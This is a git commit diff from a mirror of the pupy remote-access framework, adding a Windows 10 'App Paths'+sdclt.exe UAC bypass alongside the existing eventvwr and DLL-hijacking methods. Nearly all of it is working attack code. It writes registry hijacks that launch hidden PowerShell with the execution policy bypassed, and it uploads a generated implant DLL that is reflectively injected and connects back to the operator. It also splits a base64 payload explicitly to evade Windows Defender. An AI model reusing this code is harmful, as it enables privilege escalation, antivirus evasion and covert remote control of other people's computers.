mirror of https://github.com/n1nj4sec/pupy.git
Merge branch 'master' of https://github.com/quentinhardy/pupy into unstable
This commit is contained in:
n1nj4sec
commit
16245b91c2
|
|
@ -17,7 +17,7 @@ class BypassUAC(PupyModule):
|
|||
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog="bypassuac", description=self.__doc__)
|
||||
self.arg_parser.add_argument('-m', dest='method', choices=["eventvwr", "dll_hijacking"], default=None, help="Default: the technic will be choosen for you. 'dll_hijacking' for wind7-8.1 and 'eventvwr' for wind7-10.")
|
||||
self.arg_parser.add_argument('-m', dest='method', choices=["appPaths","eventvwr", "dll_hijacking"], default=None, help="By default, the method will be choosen for you: 'eventvwr' for wind7-8.1 and 'appPaths' for wind10. dll_hijacking method can be used for Windows 7/2008 and Windows 8/2012")
|
||||
|
||||
def run(self, args):
|
||||
# check if a UAC Bypass can be done
|
||||
|
|
@ -25,25 +25,32 @@ class BypassUAC(PupyModule):
|
|||
self.error('Your are not on the local administrator group.')
|
||||
return
|
||||
|
||||
dll_hijacking = False
|
||||
registry_hijacking = False
|
||||
appPathsMethod = False
|
||||
eventvwrMethod = False
|
||||
dllhijackingMethod = False
|
||||
|
||||
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
|
||||
# choose methods depending on the OS Version
|
||||
if not args.method:
|
||||
if self.client.desc['release'] == '10':
|
||||
registry_hijacking = True
|
||||
appPathsMethod = True
|
||||
else:
|
||||
dll_hijacking = True
|
||||
elif args.method == "eventvwr":
|
||||
registry_hijacking = True
|
||||
else:
|
||||
dll_hijacking = True
|
||||
dllhijackingMethod = True
|
||||
elif args.method == "appPaths":
|
||||
appPathsMethod = True
|
||||
elif args.method == "eventvwr":
|
||||
eventvwrMethod = True
|
||||
elif args.method == "dll_hijacking":
|
||||
dllhijackingMethod = True
|
||||
|
||||
if registry_hijacking:
|
||||
if appPathsMethod:
|
||||
self.success("Trying to bypass UAC using the 'app paths'+'sdclt.exe' method, wind10 targets ONLY...")
|
||||
bypassUasModule.bypassuac_through_appPaths()
|
||||
if eventvwrMethod:
|
||||
self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
|
||||
bypassUasModule.bypassuac_through_EventVwrBypass()
|
||||
elif dll_hijacking:
|
||||
bypassUasModule.bypassuac_through_eventVwrBypass()
|
||||
if dllhijackingMethod:
|
||||
# Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
|
||||
self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
|
||||
bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
|
||||
bypassUasModule.bypassuac_through_powerSploitBypassUAC()
|
||||
|
||||
|
|
|
|||
|
|
@ -23,10 +23,10 @@ class bypassuac():
|
|||
#Remote paths
|
||||
remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables()
|
||||
|
||||
self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
|
||||
self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
|
||||
self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
|
||||
self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
|
||||
self.invokeReflectivePEInjectionRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
|
||||
self.mainPowershellScriptRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
|
||||
self.pupyDLLRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
|
||||
self.invokeBypassUACRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
|
||||
|
||||
#Adding obfuscation on ps1 main function
|
||||
self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
|
||||
|
|
@ -37,15 +37,36 @@ class bypassuac():
|
|||
self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
|
||||
self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
|
||||
self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
|
||||
|
||||
|
||||
def bypassuac_through_EventVwrBypass(self):
|
||||
|
||||
def bypassuac_through_appPaths(self):
|
||||
'''
|
||||
Performs an UAC bypass attack by using app Paths + sdclt.exe (Wind10 Only): Thanks to enigma0x3 (https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/).
|
||||
'''
|
||||
self.module.info('Running app Paths method for bypassing UAC...')
|
||||
if '64' in self.module.client.desc['os_arch']:
|
||||
force_x86_dll = False
|
||||
else:
|
||||
force_x86_dll = True
|
||||
self.module.info('Uploading temporary files')
|
||||
self.uploadPupyDLL(force_x86_dll=force_x86_dll)
|
||||
self.uploadPowershellScripts()
|
||||
#files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
|
||||
files_to_delete=[]
|
||||
self.module.info('Altering the registry')
|
||||
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking_appPath(self.mainPowershellScriptRemotePath, files_to_delete)
|
||||
|
||||
self.module.success("Waiting for a connection from the DLL (take few seconds, 1 min max)...")
|
||||
self.module.success("If nothing happened, try to migrate to another process and try again.")
|
||||
|
||||
|
||||
def bypassuac_through_eventVwrBypass(self):
|
||||
# '''
|
||||
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
|
||||
# '''
|
||||
|
||||
# On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter
|
||||
# The pupy dll upload will be a 32 bit
|
||||
self.module.info('Running eventVwr method for bypassing UAC...')
|
||||
if '64' in self.module.client.desc['proc_arch']:
|
||||
upload_x86_dll = False
|
||||
else:
|
||||
|
|
@ -55,16 +76,17 @@ class bypassuac():
|
|||
self.uploadPowershellScripts()
|
||||
files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
|
||||
self.module.info('Altering the registry')
|
||||
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete)
|
||||
|
||||
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking_eventvwr(self.mainPowershellScriptRemotePath, files_to_delete)
|
||||
|
||||
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
|
||||
self.module.success("If nothing happened, try to migrate to another process and try again.")
|
||||
|
||||
def bypassuac_through_PowerSploitBypassUAC(self):
|
||||
|
||||
def bypassuac_through_powerSploitBypassUAC(self):
|
||||
'''
|
||||
Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
|
||||
Performs an UAC bypass attack by using the powersloit UACBypass script (wind7 to 8.1)
|
||||
'''
|
||||
#Constants
|
||||
self.module.info('Running powersloit UACBypass method for bypassing UAC...')
|
||||
bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
|
||||
self.module.info('Uploading temporary files')
|
||||
self.uploadPowershellScripts()
|
||||
|
|
@ -99,19 +121,18 @@ class bypassuac():
|
|||
cat {pupy_dll} | Out-String | iex
|
||||
{InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR
|
||||
""".format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name)
|
||||
|
||||
logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
|
||||
|
||||
logging.info("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
|
||||
with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
|
||||
w.write(mainPowerShellScriptPrivileged)
|
||||
|
||||
logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
|
||||
|
||||
logging.info("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
|
||||
content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I)
|
||||
tmp_file = os.path.join(gettempdir(),'reflective_pe.txt')
|
||||
with open(tmp_file, 'w+') as w:
|
||||
w.write(content)
|
||||
upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath)
|
||||
|
||||
logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
|
||||
logging.info("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
|
||||
upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath)
|
||||
|
||||
def uploadPupyDLL(self, force_x86_dll=False):
|
||||
|
|
@ -120,18 +141,22 @@ class bypassuac():
|
|||
'''
|
||||
res=self.module.client.conn.modules['pupy'].get_connect_back_host()
|
||||
host, port = res.rsplit(':',1)
|
||||
logging.debug("Address configured is %s:%s for pupy dll..."%(host,port))
|
||||
logging.debug("Looking for process architecture...")
|
||||
|
||||
logging.info("Address configured is %s:%s for pupy dll..."%(host,port))
|
||||
logging.info("Looking for process architecture...")
|
||||
logging.info("force x86 is %s"%force_x86_dll)
|
||||
conf = self.module.client.get_conf()
|
||||
if "64" in self.module.client.desc["os_arch"] and not force_x86_dll:
|
||||
dllbuff, tpl, _ = pupygen.generate_binary_from_template(conf, 'windows', arch='x64', shared=True)
|
||||
else:
|
||||
dllbuff, tpl, _ = pupygen.generate_binary_from_template(conf, 'windows', arch='x86', shared=True)
|
||||
|
||||
logging.debug("Creating the pupy dll (%s) in %s locally"%(tpl, self.pupyDLLLocalPath))
|
||||
|
||||
logging.info("Creating the pupy dll (%s) in %s locally"%(tpl, self.pupyDLLLocalPath))
|
||||
with open(self.pupyDLLLocalPath, 'w+') as w:
|
||||
w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
|
||||
|
||||
logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath))
|
||||
#the following powershell line in a txt file is detected by Windows defender
|
||||
#w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
|
||||
#To bypass antivirus detection:
|
||||
dllbuffEncoded = base64.b64encode(dllbuff)
|
||||
w.write('$p1="{0}";$p2="{1}";$PEBytes=[System.Convert]::FromBase64String($p1+$p2)'.format(dllbuffEncoded[0:2], dllbuffEncoded[2:]))
|
||||
|
||||
logging.info("Uploading pupy dll {0} to {1}".format(self.pupyDLLLocalPath, self.pupyDLLRemotePath))
|
||||
upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)
|
||||
|
|
|
|||
|
|
@ -20,7 +20,7 @@ def execute_powershell_script(module, content, function, x64IfPossible=False, sc
|
|||
elif "32" in module.client.desc['proc_arch']:
|
||||
arch = 'x86'
|
||||
|
||||
fullargs=[path, "-C", "-"]
|
||||
fullargs=[path, "-W", "hidden", "-C", "-"]
|
||||
|
||||
# create and store the powershell object if it not exists
|
||||
if not module.client.powershell[arch]['object']:
|
||||
|
|
|
|||
|
|
@ -2,6 +2,7 @@ import os
|
|||
import time
|
||||
import subprocess
|
||||
from _winreg import *
|
||||
import ctypes
|
||||
|
||||
def deleteTHisRemoteFile(tmp_files):
|
||||
for file in tmp_files:
|
||||
|
|
@ -15,21 +16,21 @@ def get_env_variables():
|
|||
tmp = os.path.expandvars("%TEMP%")
|
||||
except:
|
||||
tmp = os.path.expandvars("%APPDATA%")
|
||||
|
||||
|
||||
sysroot = os.path.expandvars("%SYSTEMROOT%")
|
||||
|
||||
|
||||
return tmp, sysroot
|
||||
|
||||
|
||||
def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete):
|
||||
def registry_hijacking_eventvwr(mainPowershellScriptRemotePath, files_to_delete):
|
||||
# '''
|
||||
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
|
||||
# '''
|
||||
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
|
||||
powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%")
|
||||
mscCmdPath = "Software\Classes\mscfile\shell\open\command"
|
||||
cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
|
||||
|
||||
mscCmdPath = "Software\Classes\mscfile\shell\open\command"
|
||||
cmd = "{1} -w hidden -noni -nop -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
|
||||
|
||||
try:
|
||||
# The registry key already exist in HKCU, altering...
|
||||
key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
|
||||
|
|
@ -40,15 +41,58 @@ def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete):
|
|||
registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE)
|
||||
SetValueEx(registry_key, '', 0, REG_SZ, cmd)
|
||||
CloseKey(registry_key)
|
||||
|
||||
|
||||
# Executing eventvwr.exe
|
||||
eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
|
||||
output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
|
||||
# Sleeping 5 secds...
|
||||
time.sleep(5)
|
||||
|
||||
|
||||
#Clean everything
|
||||
DeleteKey(HKCU, mscCmdPath)
|
||||
deleteTHisRemoteFile(files_to_delete)
|
||||
|
||||
|
||||
def registry_hijacking_appPath(mainPowershellScriptRemotePath, files_to_delete):
|
||||
'''
|
||||
'''
|
||||
tmp, sysRoot = get_env_variables()
|
||||
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
|
||||
appPathsPath = "Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe"
|
||||
powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % sysRoot
|
||||
cmd = "{0} -w hidden -noni -nop -ExecutionPolicy Bypass -File {1}".format(powershellPath, mainPowershellScriptRemotePath)
|
||||
cmdPath = "{0}\\temp.bat".format(tmp)
|
||||
|
||||
try:
|
||||
# The registry key already exist in HKCU, altering...
|
||||
key = OpenKey(HKCU, appPathsPath, KEY_SET_VALUE)
|
||||
except:
|
||||
# Adding the registry key in HKCU
|
||||
key = CreateKey(HKCU, appPathsPath)
|
||||
|
||||
registry_key = OpenKey(HKCU, appPathsPath, 0, KEY_WRITE)
|
||||
SetValueEx(registry_key, '', 0, REG_SZ, cmdPath)
|
||||
CloseKey(registry_key)
|
||||
|
||||
#Creates cmd file
|
||||
f=open(cmdPath, "w")
|
||||
f.write(cmd)
|
||||
f.close()
|
||||
|
||||
# Creation sdclt.exe path
|
||||
triggerPath = os.path.join(os.environ['WINDIR'],'System32','sdclt.exe')
|
||||
#Disables file system redirection for the calling thread (File system redirection is enabled by default)
|
||||
wow64 = ctypes.c_long(0)
|
||||
ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(ctypes.byref(wow64))
|
||||
# Executing sdclt.exe
|
||||
output = subprocess.check_output(triggerPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
#Enable file system redirection for the calling thread
|
||||
ctypes.windll.kernel32.Wow64EnableWow64FsRedirection(wow64)
|
||||
|
||||
# Sleeping 5 secds...
|
||||
time.sleep(5)
|
||||
|
||||
#Clean everything
|
||||
DeleteKey(HKCU, appPathsPath)
|
||||
deleteTHisRemoteFile(files_to_delete)
|
||||
deleteTHisRemoteFile([cmdPath])
|
||||
|
|
|
|||
Loading…
Reference in New Issue